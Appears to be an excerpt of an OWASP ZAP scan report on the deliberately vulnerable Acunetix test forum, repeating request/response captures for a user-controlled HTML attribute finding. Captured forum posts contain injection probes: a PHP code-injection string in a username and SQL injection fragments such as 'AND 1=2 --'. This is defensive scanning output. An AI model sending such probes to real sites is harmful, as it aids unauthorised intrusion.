<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | POST |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=10 |
| Method | POST |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | POST |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | POST |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | POST |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:44 GMT Content-Length: 3066 |
| Response Body - size: 3,066 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | POST |
| Parameter | id |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:46 GMT Content-Length: 3073 |
| Response Body - size: 3,073 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 12 |
| Solution |
Validate all input and sanitize output it before writing to any HTML attributes.
|
| Reference | http://websecuritytool.codeplex.com/wikipage?title=Checks#user-controlled-html-attribute |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 20 |
| WASC Id | 20 |
| Plugin Id | 10031 |